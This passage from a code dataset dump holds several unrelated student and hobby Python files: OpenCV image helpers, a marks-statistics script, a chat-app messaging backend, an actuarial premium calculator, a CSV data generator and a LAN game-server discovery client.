dst\n\ndef convertBinary(image):\n img = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n blur = cv2.blur(img,(5,5))\n thresh = cv2.threshold(blur,100,255,cv2.THRESH_BINARY)[-1]\n return thresh\n\ndef adaptiveThresholding(image, blur):\n if len(image.shape) != 2:\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n \n img = cv2.medianBlur(gray,blur)\n\n ret,th1 = cv2.threshold(img,127,255,cv2.THRESH_BINARY)\n th2 = cv2.adaptiveThreshold(img,255,cv2.ADAPTIVE_THRESH_MEAN_C,\\\n cv2.THRESH_BINARY,11,2)\n th3 = cv2.adaptiveThreshold(img,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\\\n cv2.THRESH_BINARY,11,2)\n\n return th2, th3\n\ndef colourThresholdingHSV(image):\n image = image[image.shape[0] - int(image.shape[0]/10):, :]\n image = cv2.pyrUp(image)\n hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n\n huL = 30\n huH = 179\n saL = 35\n saH = 255\n vaL = 0\n vaH = 255\n HSVLOW = np.array([huL, saL, vaL])\n HSVHIGH = np.array([huH, saH, vaH])\n\n # apply the range on a mask\n mask = cv2.inRange(hsv, HSVLOW, HSVHIGH)\n maskedFrame = cv2.bitwise_and(image, image, mask = mask)\n \n return maskedFrame, image\n\ndef getContours(image, maskedFrame):\n sizeL = 20**2\n sizeH = 450**2\n objColor = (0,0,255)\n marked = image.copy()\n ratio = 8\n start_dist = 1.5\n \n # Count the contours on masked frame\n kernel = np.ones((5,5),np.uint8)\n masked2 = cv2.dilate(maskedFrame, kernel, iterations = 1)\n masked = cv2.cvtColor(masked2, cv2.COLOR_BGR2GRAY)\n Contours, hierarchy = cv2.findContours(masked, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n rangeCount = 0\n\n for i in range (0, len(Contours)):\n cnt = Contours[i]\n x,y,w,h = cv2.boundingRect(cnt)\n area = cv2.contourArea(cnt)\n if sizeL < area < sizeH:\n distance = ratio - (y+h)*ratio/image.shape[0] + start_dist\n distance = \"{:.2f}\".format(distance)\n rangeCount = rangeCount + 1\n cv2.drawContours(marked, [cnt], -1, objColor, 3)\n marked = cv2.rectangle(marked, (x, y), (x+w, y+h), (255,255,255), 2)\n marked = cv2.putText(marked, str(distance), (x+w, y+h), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,255,255), 2)\n\n return marked, rangeCount\n\ndef getCoords(event,x,y,flags,img):\n\n if event == cv2.EVENT_LBUTTONDBLCLK:\n print(x, y)\n cv2.circle(img,(x,y),3,(255,0,0),-1)\n\ndef centerLines(image):\n # image = cv2.rectangle(image, (0, int(image.shape[0]/2)), (image.shape[1], int(image.shape[0]/2)), (0,0,0), 2)\n # image = cv2.rectangle(image, (int(image.shape[1]/2), 0), (int(image.shape[1]/2), image.shape[0]), (0,0,0), 2)\n return image\n\n\n\nif __name__ == '__main__':\n pass","repo_name":"laukikk/Vision-Based-Navigator","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"70726750201","text":"# 前两位数字相同,后两位数字相同\n# 组合起来各不相同,并且是某数的平方\n\ntemp = int(input(\"输入车牌号\"))\nflag = 0 \nfor i in range(10):\n for j in range(10):\n '''穷举前两位和后两位数字'''\n if i != j:\n '''不相同才继续'''\n # 这一步代表的含义是按数位累加,相加之后才能用平方计算\n k = 1000*i+100*i+10*j+j\n '''判断k是不是某个整数的平方,是就输出'''\n # 优化算法,从(31开始,因为30之前数字平方小于4)\n for temp in range(31,100):\n if temp * temp == k:\n print(k)\n flag = 1\n break\n\n ","repo_name":"danyow-cheung/Algorithms_python","sub_path":"趣味算法/c1_traffic_accident.py","file_name":"c1_traffic_accident.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9921673120","text":"\"\"\"read peoples names and marks from a text file and out the names of those who arent within one standard deviaition of the marks\r\nMichael field\r\n10 may 2014\"\"\"\r\n\r\ndef stdDev(marks, ave):\r\n stddev = 0\r\n \r\n for mark in marks:\r\n mark = eval(mark)\r\n stddev += (mark - ave)**2\r\n \r\n stddev = stddev/len(marks)\r\n stddev = stddev**0.5\r\n \r\n return stddev\r\n\r\nlines = []\r\n\r\nfile = input(\"Enter the marks filename:\\n\")\r\n\r\nf = open (file, \"r\")\r\n#insert each line into the lines array\r\nfor line in f:\r\n lines.append(line)\r\n\r\nf.close()\r\n\r\n#remove the \\n\r\nfor i in range(len(lines)):\r\n if i != len(lines)-1:\r\n lines[i] = lines[i][:-1]\r\n\r\nNameMark = []\r\nnames = []\r\nmarks = []\r\n\r\n#split names and marks\r\nfor line in lines:\r\n NameMark = line.split(\",\")\r\n names.append(NameMark[0])\r\n marks.append(NameMark[1])\r\n \r\n#calc the average\r\ntotal = 0\r\nfor mark in marks:\r\n total += eval(mark)\r\nave = total/len(marks)\r\n\r\nprint(\"The average is:\", '%.2f' % ave)\r\nsd = stdDev(marks, ave)\r\nprint(\"The std deviation is:\", '%.2f' % sd)\r\n\r\nif (ave-sd) != ave:\r\n print(\"List of students who need to see an advisor:\")\r\n\r\nfor pos in range(len(marks)):\r\n if eval(marks[pos]) < (ave-sd):\r\n print(names[pos])","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_9/fldmic006/question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36402482414","text":"'''\nAuthors: \n Justin Wu, z5316037\n William Zheng, z5313015\n Alec Dudley-Bestow, z5260201\nDate: \n\n 25 March 2021\n'''\n\nfrom src.error import InputError, AccessError\nfrom src.auth import auth_register, check_token, get_data, write_data, check_u_id\nfrom src.channels import channels_create\nfrom src.channel import channel_id_valid, member_check, get_channel_index, user_is_owner_token, user_is_member, user_is_owner_uid, check_channel_id, check_is_member, update_user\nfrom datetime import datetime, timezone\nfrom src.other import insert_tag_notification\nimport threading\nimport time\nfrom src.helper import message_id_exists, message_id_generate, message_is_sender, message_too_long, \\\nsearch_message_id, owner_check, already_reacted, edit_react\n\nimport jwt\n\nSECRET = 'atotallysecuresecret'\nmessage_id_queue = [] #The reason to have this global variable is for the message_sendlater which requires\n#threading.Timer that can't return the variable from message_send\n\n\ndef update_message_stats(func):\n def wrap(*args, **kw):\n resp = func(*args, **kw)\n msgs_exist = 0\n data = get_data()\n for channel in data['channels']:\n msgs_exist += len(channel['messages'])\n data = update_user('messages_exist', msgs_exist, data)\n write_data(data)\n return resp\n return wrap\n\n@update_message_stats\ndef message_send(token, channel_id, message, **kw):\n '''\n Send a message from authorised_user to the channel specified by channel_id. \n Note: Each message should have it's own unique ID. \n I.E. No messages should share an ID with another message, \n even if that other message is in a different channel.\n Arguments:\n token (string) - JWT token encrypted with user's u_id and session_id.\n channel_id (int) - Id of inputted channel.\n message (string) - User's message to the specified channel.\n\n Exceptions:\n InputError - Message is more than 1000 characters.\n AccessError - When the authorised user has not joined the channel they are trying to post to.\n\n Return Value:\n Dictionary containing 'message_id'.\n ''' \n user_index = check_token(token)\n\n data = get_data()\n if not channel_id_valid(channel_id, data['channels']):\n raise InputError(description=\"Invalid channel id!\")\n \n message_too_long(message)\n \n # Decode token to get u_id\n token_structure = jwt.decode(token, SECRET, algorithms=['HS256'])\n u_id = token_structure['u_id']\n if not member_check(u_id, channel_id, data['channels']):\n raise AccessError(description=\"User is not a member of the channel!\")\n\n # Generate unique id for message\n message_id = message_id_generate()\n\n # Go to the channel and append the message and message_id\n channel_index = get_channel_index(channel_id)\n \n time = int(datetime.now().timestamp())\n data['channels'][channel_index]['messages'].append({\n 'message_id': message_id,\n 'u_id': u_id,\n 'message': message,\n 'time_created': time,\n 'is_pinned': False,\n 'reacts': [{\n 'react_id': 1,\n 'u_ids': [],\n 'is_this_user_reacted': False\n }]\n })\n\n user = data['users'][user_index]\n num_messages = user['messages_sent'][-1]['num_messages_sent']\n \n data['users'][user_index]['messages_sent'].append({\n 'num_messages_sent' : num_messages + 1,\n 'time_stamp' : datetime.now().timestamp()\n })\n write_data(data)\n insert_tag_notification(token, channel_id, message)\n #get the message_id for sendlater\n global message_id_queue\n message_id_queue.append(message_id) #For message_sendlater threading.Timer\n return {\n 'message_id': message_id,\n }\n\n@update_message_stats\ndef message_remove(token, message_id):\n ''' \n Given a message_id for a message, this message is removed from the channel/DM\n \n Parameters:\n token - Token for authorised user\n message_id - message id for message being removed\n\n Exceptions:\n InputError - Message (based on ID) no longer exists.\n AccessError - Message with message_id was sent by the authorised user \n making this request.\n AccessError - The authorised user is an owner of this channel (if it was sent \n to a channel) or the **Dreams**.\n\n Returns:\n None\n '''\n data = get_data()\n user_index = check_token(token)\n\n # Message doesnt exist\n message, channel = message_id_exists(message_id)\n if message == None:\n raise InputError(description=\"Invalid message id!\")\n\n # Message not sent by authorised user\n if message_is_sender(data['users'][user_index]['u_id'], message) == False:\n raise AccessError(description=\"Message with message_id was NOT sent by the authorised user making this request!\")\n\n # Auth user is not owner of channel or dreams\n # NOTE Function is imported from channel so not on this branch\n if user_is_owner_token(token, channel['channel_id']) == False:\n raise AccessError(description=\"The authorised user is an owner of this channel (if it was sent to a channel) or the **Dreams**!\")\n\n for ch in data['channels']:\n if ch['channel_id'] == channel['channel_id']:\n ch['messages'].remove(message)\n\n write_data(data)\n return {}\n\ndef message_edit(token, message_id, message):\n '''\n Given a message, update its text with new text. \n If the new message is an empty string, the message is deleted.\n\n Arguments:\n token (string) - JWT token encrypted with user's u_id and session_id.\n message_id (int) - Id of message to be edited.\n message (string) - Autherised user's message to the specified channel.\n\n Exceptions:\n InputError - Length of new message is over 1000 characters.\n InputError - Message_id refers to a deleted message.\n AccessError - Different user is trying to edit another user's message.\n AccessError - The user trying to edit their message is not an owner of the channel/dm.\n \n Return:\n None\n '''\n data = get_data()\n\n # InputError - Length of new message is over 1000 characters.\n message_too_long(message)\n\n check_token(token)\n token_structure = jwt.decode(token, SECRET, algorithms=['HS256'])\n auth_user_id = token_structure['u_id']\n\n # InputError - Message_id refers to a deleted message.\n channel_id, msg_index = search_message_id(message_id)\n channel_index = get_channel_index(channel_id)\n check_u_id(auth_user_id)\n\n # AccessError - The user trying to edit their message is not an owner of the channel/dm.\n owner_check(data['channels'][channel_index]['owner_members'], auth_user_id)\n\n # AccessError - Different user is trying to edit another user's message.\n u_id = data['channels'][channel_index]['messages'][msg_index]['u_id']\n if auth_user_id != u_id:\n raise AccessError(description=\"User trying to edit the message is not the auth user who made the message!\")\n\n # If given empty string\n if len(message) == 0:\n message_remove(token, message_id)\n \n # Otherwise edit the old message.\n data['channels'][channel_index]['messages'][msg_index]['message'] = message\n \n write_data(data)\n return {\n }\n\n\ndef message_senddm(token, dm_id, message, **kw):\n '''\n Send a message from authorised_user to the DM specified by dm_id. Note: Each message should \n have it's own unique ID. I.E. No messages should share an ID with another message, even if \n that other message is in a different channel or DM.\n\n Arguments:\n token (string) - JWT token encrypted with user's u_id and session_id.\n dm_id (int) - Id of inputted dm.\n message (string) - User's message to the specified channel.\n \n Exceptions:\n InputError - Length of new message is over 1000 characters.\n AccessError - When the authorised user is not a member of the DM they are trying to post to.\n \n Return Value:\n Dictionary containing 'message_id'.\n '''\n dm_msg_id = message_send(token, dm_id, message)['message_id']\n\n return {\n 'message_id': dm_msg_id\n }\n\ndef message_share(token, og_message_id, message, channel_id, dm_id):\n '''\n Given a message_id, auth_user will share this messageto a channel or dm. \n If an optional message is given, it is added in addition to the originally shared message.\n\n Arguments:\n token (string) - JWT token encrypted with user's u_id and session_id.\n og_message_id (int) - Id of the original message. \n message(string) - Message is the optional message in addition to the shared message, and will be an empty string '' if no message is given\n channel_id (int) - Channel Id that the message is being shared to, and is -1 if it is being sent to a DM.\n dm_id (int) - Dm Id that the message is being shared to, and is -1 if it is being sent to a channel.\n \n Exceptions:\n AccessError - When the authorised user has not joined the channel or DM they are trying to share the message to.\n \n Returns:\n Dicitonaring containing a shared_message_id\n '''\n data = get_data()\n\n check_token(token)\n\n token_structure = jwt.decode(token, SECRET, algorithms=['HS256'])\n u_id = token_structure['u_id']\n\n # First fetch the actual og message from og_msg_id.\n og_channel_id, og_msg_index = search_message_id(og_message_id)\n og_channel_index = get_channel_index(og_channel_id)\n\n # Get a copy of the message.\n og_message = data['channels'][og_channel_index]['messages'][og_msg_index]['message']\n\n # Shared message combines the og_message and an optional message.\n shared_msg = og_message + \", \" + message\n\n # Sending to dm.\n if channel_id == -1:\n if not member_check(u_id, dm_id, data['channels']):\n raise AccessError(description=\"User is not a member of the dm!\")\n shared_message_id = message_senddm(token, dm_id, shared_msg)['message_id']\n\n # Sending to channel\n if dm_id == -1:\n if not member_check(u_id, channel_id, data['channels']):\n raise AccessError(description=\"User is not a member of the channel!\")\n shared_message_id = message_send(token, channel_id, shared_msg)['message_id']\n\n return {\n 'shared_message_id': shared_message_id,\n }\n\ndef message_sendlater(token, channel_id, message, time_sent, **kw):\n '''\n This function allows users to send the message only after specify a time\n Arguments:\n token(string)\n channel_id(int)\n message(string)\n time_sent(timestamp) - the specific time that the message will be sent\n Returns:\n message_id(id)\n '''\n #Inputerror: channel ID is not a valid channel\n check_channel_id(channel_id)\n #Inputerror: Message is more than 1000\n if len(message) > 1000:\n raise InputError(description=\"Message is more than 1000\")\n #Inputerror: Time sent is a time in the past\n # timestamp_now = datetime.now().replace(tzinfo=timezone.utc).timestamp()\n timestamp_now = datetime.now().timestamp()\n # print(f\"time_sent = {time_sent}\")\n # print(f\"timestamp_now = {timestamp_now}\")\n if time_sent < timestamp_now:\n raise InputError(description=\"Time sent is a time in the past\")\n \n #AccessError: when the authorised user has not joined the channel they are trying to post to\n data = get_data()\n check_is_member(data['users'][check_token(token)]['u_id'], data['channels'][check_channel_id(channel_id)]['all_members'])\n\n #send the user after the time_sent\n # print()\n time_count = time_sent - timestamp_now\n # t = threading.Timer(time_count, message_send, [token, channel_id, message])\n # .start()\n time.sleep(time_count)\n message_id = message_send(token, channel_id, message)\n # message_id = message_id_queue.pop()\n return {\n 'message_id': message_id\n }\n\ndef message_sendlaterdm(token, dm_id, message, time_sent, **kw):\n # print(f'token = {token}, dm_id = {dm_id}, message = {message}')\n return message_sendlater(token, dm_id, message, time_sent)['message_id']\n\ndef message_pin(token, message_id):\n '''\n Given a message within a channel or DM, mark it as \"pinned\" to be given \n special display treatment by the frontend.\n\n Paramaters:\n token - token of authorised user\n message_id - message id for the message being pinned\n \n Exceptions:\n InputError - message_id is not a valid message.\n InputError - Message with ID message_id is already pinned.\n AccessError - The authorised user is not a member of the channel or DM \n that the message is within.\n AccessError - The authorised user is not an owner of the channel or DM.\n\n Returns:\n None\n '''\n data = get_data()\n user_index = check_token(token)\n\n message, channel = message_id_exists(message_id)\n if message == None:\n raise InputError\n\n if message['is_pinned'] == True:\n raise InputError\n\n if user_is_member(data['users'][user_index]['u_id'], channel) == False:\n raise AccessError\n \n if user_is_owner_uid(data['users'][user_index]['u_id'], channel['channel_id']) == False:\n raise AccessError\n\n for ch in data['channels']:\n if ch['channel_id'] == channel['channel_id']:\n for msg in ch['messages']:\n if msg['message_id'] == message['message_id']:\n msg['is_pinned'] = True\n\n write_data(data)\n return {}\n\ndef message_unpin(token, message_id):\n '''\n Given a message within a channel or DM, remove it's mark as unpinned.\n \n Paramaters:\n token - Token of authorised user\n message_id - Message id for the message being unpinned\n \n Exceptions:\n InputError - message_id is not a valid message.\n InputError - Message with ID message_id is already unpinned.\n AccessError - The authorised user is not a member of the channel or DM \n that the message is within.\n AccessError - The authorised user is not an owner of the channel or DM.\n\n Returns:\n None\n '''\n data = get_data()\n user_index = check_token(token)\n\n message, channel = message_id_exists(message_id)\n if message == None:\n raise InputError\n\n if message['is_pinned'] == False:\n raise InputError\n\n if user_is_member(data['users'][user_index]['u_id'], channel) == False:\n raise AccessError\n \n if user_is_owner_uid(data['users'][user_index]['u_id'], channel['channel_id']) == False:\n raise AccessError\n\n for ch in data['channels']:\n if ch['channel_id'] == channel['channel_id']:\n for msg in ch['messages']:\n if msg['message_id'] == message['message_id']:\n msg['is_pinned'] = False\n\n write_data(data)\n return {}\n\n\ndef message_react(token, message_id, react_id):\n '''\n Given a message within a channel or DM the authorised user is part of, \n add a \"react\" to that particular message.\n\n Parameters:\n token - Token for authorised user\n message_id - Message id of message being reacted\n react_id - Id for the specific react type\n \n Exceptions:\n InputError - message_id is not a valid message within a channel or \n DM that the authorised user has joined.\n InputError - react_id is not a valid React ID. The only valid react \n ID the frontend has is 1.\n InputError - Message with ID message_id already contains an active \n React with ID react_id from the authorised user.\n AccessError - The authorised user is not a member of the channel or \n DM that the message is within.\n \n Returns:\n None\n '''\n data = get_data()\n user_index = check_token(token)\n \n message, channel = message_id_exists(message_id)\n if message == None:\n raise InputError\n \n if react_id != 1:\n raise InputError\n\n if already_reacted(react_id, message) == True:\n raise InputError\n \n if user_is_member(data['users'][user_index]['u_id'], channel) == False:\n raise AccessError\n\n for ch in data['channels']:\n if ch['channel_id'] == channel['channel_id']:\n for msg in ch['messages']:\n if msg['message_id'] == message['message_id']:\n edit_react(msg, react_id, data['users'][user_index]['u_id'], 'append')\n\n write_data(data)\n return {}\n\n\ndef message_unreact(token, message_id, react_id):\n '''\n Given a message within a channel or DM the authorised user is part of, \n remove a \"react\" to that particular message\n \n Parameters:\n token - Token for authorised user\n message_id - Message id of message being unreacted\n react_id - Id for the specific react type\n \n Exceptions:\n InputError - message_id is not a valid message within a channel or \n DM that the authorised user has joined.\n InputError - react_id is not a valid React ID. The only valid react \n ID the frontend has is 1.\n InputError - Message with ID message_id does not contain an active \n React with ID react_id from the authorised user.\n AccessError - The authorised user is not a member of the channel or \n DM that the message is within.\n \n Returns:\n None\n '''\n data = get_data()\n user_index = check_token(token)\n \n message, channel = message_id_exists(message_id)\n if message == None:\n raise InputError\n\n if react_id != 1:\n raise InputError\n\n if already_reacted(react_id, message) == False:\n raise InputError\n \n if user_is_member(data['users'][user_index]['u_id'], channel) == False:\n raise AccessError\n\n for ch in data['channels']:\n if ch['channel_id'] == channel['channel_id']:\n for msg in ch['messages']:\n if msg['message_id'] == message['message_id']:\n edit_react(msg, react_id, data['users'][user_index]['u_id'], 'remove')\n\n write_data(data)\n return {}\n\n","repo_name":"AlanFengyuWang/unsw_dream_project","sub_path":"project-backend/src/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":18153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42679255719","text":"import numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\n\nclass MyPV:\n def __init__(self, excel_file : str = './INFO.xlsx', fillNa = 0):\n # 엑셀파일 읽기\n sht_rate = pd.read_excel(excel_file, sheet_name=\"위험률\", header=2)\n sht_code = pd.read_excel(excel_file, sheet_name=\"코드\", header=2)\n sht_comb = pd.read_excel(excel_file, sheet_name=\"결합위험률\", header=2)\n sht_G = pd.read_excel(excel_file, sheet_name=\"영업보험료\")\n sht_V = pd.read_excel(excel_file, sheet_name=\"준비금\")\n \n # 전처리\n self.fillNa = 0 \n self.sht_rate = sht_rate[['RiskKey', 'RiskCode', 'PassYear', 'x', 'Male', 'Female']].fillna(self.fillNa)\n self.sht_code = sht_code[['RiskKind','KEY', 'BenefitNum', 'ExitCode', 'NonCov',\\\n 'BenefitCode', 'DefryRate', 'ReducRate', 'ReducPeriod', \\\n 'GrantCode', 'InvalidPeriod']].fillna(self.fillNa) \n self.sht_comb = sht_comb[['CombRiskKey', 'Operation', 'NumRiskKey'] \\\n + [f\"RiskKey({i})\" for i in range(1, 8+1)] + [f\"Period({i})\" for i in range(1, 8+1)]].fillna(self.fillNa)\n self.sht_G = sht_G\n self.sht_V = sht_V\n\n # 공시이율\n self.i = 0.0225\n self.v = 1/(1+self.i)\n\n # 계약 시점에 가입자 수\n self.l0 = 100000\n\n\n\n # 전역변수 세팅\n def setArgs(self, KEY : str, sex : int, x : int,\\\n n : int, m : int, mPrime : int, AMT : int, re : int, passYear : int = None): \n \"\"\"\n KEY : 담보키\n re : 갱신여부 ---> 1 : 최초계약 / 2 : 갱신계약\n mPrime : 납입주기\n passYear : 경과기간\n \"\"\"\n assert m<=n\n assert sex in [1, 2]\n assert x+n<120 \n \n self.KEY = KEY\n self.sex = sex\n self.x = x\n self.n = n\n self.m = m\n self.mPrime = mPrime\n self.AMT = AMT\n self.passYear = 0 if passYear==None else passYear\n\n # 사업비 세팅\n self.re = re\n if self.re == 1:\n alpha = 0.3\n else:\n if n == 1:\n alpha = 0.07\n elif n==2:\n alpha = 0.14\n else:\n alpha = 0.21\n self.alpha = alpha\n self.beta = 0.19\n self.beta5 = 0.02\n self.ce = 0.038 # 손해조사비\n\n # 한계연령\n self.w = 108 if self.sex == 1 else 110 \n # projection 기간 (0, 1, 2, ... , n ---> n+1)\n self.proj = self.n+1\n\n def getQx(self, riskKey : str, sex : int = None, start : int = None) -> np.array:\n if sex == None:\n sex = self.sex\n if start == None:\n start = self.x\n df = self.sht_rate.loc[self.sht_rate['RiskKey'] == riskKey].copy(deep=True)\n if sex==1:\n df = df[['x', 'Male']]\n else:\n df = df[['x', 'Female']]\n qx = np.zeros(120)\n for row in df.values: \n age, rate = row\n qx[int(age)] = rate\n return qx[start:]\n\n # 결합위험률 생성 코드\n def getCombQx(self, combRiskKey : str):\n df = self.sht_comb.loc[self.sht_comb['CombRiskKey'] == combRiskKey].copy(deep=True)\n row = df.values[0]\n combRiskKey, operation, numRiskKey = row[:3]\n riskKeys = row[3:3+int(numRiskKey)]\n periods = row[11:11+int(numRiskKey)] \n if operation == 1:\n qx = np.zeros(120-self.x) \n for rKey, period in zip(riskKeys, periods):\n if rKey[0] == \"C\":\n qx_i = self.getCombQx(rKey)\n else:\n qx_i = self.getQx(rKey, sex = self.sex, start=self.x) \n qx_i[0] *= (1-period/12) \n qx += qx_i\n elif operation == 2:\n qx = np.ones(120-self.x) \n for rKey, period in zip(riskKeys, periods):\n if rKey[0] == \"C\":\n qx_i = self.getCombQx(rKey)\n else:\n qx_i = self.getQx(rKey, sex = self.sex, start=self.x) \n qx_i[0] *= (1-period/12)\n qx *= 1-qx_i\n qx = 1-qx\n else:\n raise ValueError(\"결합위험률 시트 operation 입력 오류\") \n return qx\n\n def getMatrixQx(self, riskKey : str)->np.array:\n firstJoin = self.x - self.passYear # 최초가입연령 = 가입연령 - 경과기간\n df = self.sht_rate.loc[(self.sht_rate['x'] == firstJoin) & \\\n (self.sht_rate['RiskKey'] == riskKey)].copy(deep = True)\n if self.sex == 1:df = df[['PassYear', 'Male']]\n else:df = df[['PassYear', 'Female']]\n qx = np.zeros(120)\n for row in df.values:\n age, rate = row\n qx[int(age)] = rate\n return qx \n \n def Calc(self, returnSample : bool = False):\n df = self.sht_code.copy(deep=True)\n df = df.loc[df['KEY'] == self.KEY]\n # Initialize\n Dx, DxPrime, Nx, NxPrime, tVx, tWx, SUMx = [0.]*(self.proj), [0.]*(self.proj), [0.]*(self.proj),\\\n [0.]*(self.proj), [], [], [0.]*(self.proj)\n sample_dict = {}\n for row in df.values:\n lx = []\n # unpack\n riskKind, _ , benefitNum, exitCode, nonCov, benefitCode, defryRate, reducRate, reducPeriod, grantCode, invalidPeriod = row \n # float ---> int\n nonCov = int(nonCov) \n reducPeriod = int(reducPeriod)\n invalidPeriod = int(invalidPeriod)\n ##------------ 위험율 세팅 ------------## \n # 결합위험률을 사용하는 경우\n if riskKind == \"C\":\n if benefitNum != 99:\n # 탈퇴율\n if exitCode == self.fillNa:\n q_exit = np.zeros(self.proj)\n else:\n q_exit = self.getCombQx(combRiskKey=exitCode) \n # 급부율 \n if benefitCode == self.fillNa:\n q_benefit = np.zeros(self.proj)\n else:\n q_benefit = self.getCombQx(combRiskKey=benefitCode) \n else:\n # 납입면제율 \n if grantCode == self.fillNa:\n q_grant = np.zeros(self.proj)\n else:\n q_grant = self.getCombQx(combRiskKey=grantCode) \n\n # Matrix 위험률을 사용하는 경우\n elif riskKind == \"M\":\n if benefitNum != 99:\n # 탈퇴율\n if exitCode == self.fillNa:\n q_exit = np.zeros(self.proj)\n else:\n q_exit = self.getMatrixQx(riskKey=exitCode) \n # 급부율 \n if benefitCode == self.fillNa:\n q_benefit = np.zeros(self.proj)\n else:\n q_benefit = self.getMatrixQx(riskKey=benefitCode) \n else:\n # 납입면제율 \n if grantCode == self.fillNa:\n q_grant = np.zeros(self.proj)\n else:\n q_grant = self.getMatrixQx(riskKey=grantCode) \n \n # 아닌경우\n else:\n if benefitNum != 99:\n # 탈퇴율\n if exitCode == self.fillNa:\n q_exit = np.zeros(self.proj)\n else:\n q_exit = self.getQx(riskKey = exitCode) \n # 급부율 \n if benefitCode == self.fillNa:\n q_benefit = np.zeros(self.proj)\n else:\n q_benefit = self.getQx(riskKey=benefitCode) \n else:\n # 납입면제율 \n if grantCode == self.fillNa:\n q_grant = np.zeros(self.proj)\n else:\n q_grant = self.getQx(riskKey=grantCode) \n \n ## ------------ lx ------------ ##\n if benefitNum != 99:\n # 유지자 \n lx = [self.l0] \n for t in range(self.proj-1):\n q = q_exit[t]\n if t==0:\n q*=(1-nonCov/12)\n l_next = lx[t]*(1-q)\n lx.append(l_next) \n else:\n # 납입자\n lx = [self.l0]\n for t in range(self.proj-1):\n q = q_grant[t]\n if t==0:\n q*=(1-invalidPeriod/12)\n l_next = lx[t]*(1-q)\n lx.append(l_next) \n\n ## ------------ 기수식 ------------ ##\n # Dx, Nx\n if benefitNum == 0:\n Dx = [lx[t]*self.v**t for t in range(self.proj)]\n Nx = [sum(Dx[t:]) for t in range(self.proj)]\n # D'x, N'x\n elif benefitNum == 99:\n DxPrime = [lx[t]*self.v**t for t in range(self.proj)]\n NxPrime = [sum(DxPrime[t:]) for t in range(self.proj)]\n # dx, Cx, Mx, SUMx\n else:\n dx = [q_benefit[t]*lx[t] for t in range(self.proj)]\n Cx = [dx[t]*self.v**(t+0.5) for t in range(self.proj)]\n Mx = [sum(Cx[t:]) for t in range(self.proj)]\n for t in range(self.proj):\n if t 0.875:\n charger_connectors_rows.append(str(uuid.uuid4()) + \",\" + row[0] + \",\" + charger_connector_uuid_arr[0] + \",0,0,0\\n\")\n elif dice > 0.75:\n charger_connectors_rows.append(str(uuid.uuid4()) + \",\" + row[0] + \",\" + charger_connector_uuid_arr[1] + \",0,0,0\\n\")\n elif dice > 0.625:\n charger_connectors_rows.append(str(uuid.uuid4()) + \",\" + row[0] + \",\" + charger_connector_uuid_arr[2] + \",0,0,0\\n\")\n elif dice > 0.5:\n charger_connectors_rows.append(str(uuid.uuid4()) + \",\" + row[0] + \",\" + charger_connector_uuid_arr[3] + \",0,0,0\\n\")\n elif dice > 0.375:\n charger_connectors_rows.append(str(uuid.uuid4()) + \",\" + row[0] + \",\" + charger_connector_uuid_arr[4] + \",0,0,0\\n\")\n elif dice > 0.25:\n charger_connectors_rows.append(str(uuid.uuid4()) + \",\" + row[0] + \",\" + charger_connector_uuid_arr[5] + \",0,0,0\\n\")\n elif dice > 0.125:\n charger_connectors_rows.append(str(uuid.uuid4()) + \",\" + row[0] + \",\" + charger_connector_uuid_arr[6] + \",0,0,0\\n\")\n else:\n charger_connectors_rows.append(str(uuid.uuid4()) + \",\" + row[0] + \",\" + charger_connector_uuid_arr[7] + \",0,0,0\\n\")\n\nwith open(CHARGER_CONNECTOR_OUT, 'w', encoding='UTF-8') as file:\n rows = [file.write(line) for line in charger_connectors_rows]\n\n#####\n\ndt = datetime.datetime(2023, 4, 1)\n\ncharger_rate_historic_rows.append(\"id,id_charger,rate,timestamp\\n\")\n\nfor i in range(91*24):\n dt_string = dt.isoformat(sep='T', timespec='auto')\n for count, row in enumerate(charger_rows_2d):\n if count == 0:\n continue\n else:\n random_rate = str(round(random.uniform(0.1, 0.5), 2))\n charger_rate_historic_rows.append(str(uuid.uuid4()) + \",\" + row[0] + \",\" + random_rate + \",\" + dt_string + \"\\n\")\n\n dt = dt + datetime.timedelta(hours=1)\n\nwith open(CHARGER_RATE_HISTORIC_PUT, 'w', encoding='UTF-8') as file:\n rows = [file.write(line) for line in charger_rate_historic_rows]\n","repo_name":"maximus-lee-678/team_15_flask_react","sub_path":"datasets/uuider.py","file_name":"uuider.py","file_ext":"py","file_size_in_byte":4204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27692894653","text":"import pickle\nimport socket\nimport time\nfrom typing import Any\nfrom graphical.widgets.menu import Menu\n\nfrom multi.multiplayerClient import MultiplayerGame\n\n\nclass SearchServer():\n \"\"\"this class is used to create the sockets for discovery and the server\"\"\"\n\n def __init__(self) -> None:\n self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.discoSock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.discoSock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\n self.DISCOVERY_MSG = b\"SERVER_DISCOVERY_REQUEST\"\n\n def discover(self) -> list[dict[str, Any]]:\n \"\"\"send a discovery message on broadcast to find potential hosts on the local network returns a list of\n lobby with\"\"\"\n self.discoSock.sendto(self.DISCOVERY_MSG, ('', 5555))\n # Set a timeout of 5 seconds for waiting for responses\n self.discoSock.settimeout(1.0)\n serverList = list[dict[str, Any]]()\n\n try:\n start_time = time.time()\n while time.time() - start_time < 3:\n\n data, _ = self.discoSock.recvfrom(1024)\n try:\n server_info = pickle.loads(data)\n serverList.append(server_info)\n print(\"Server info:\", server_info)\n 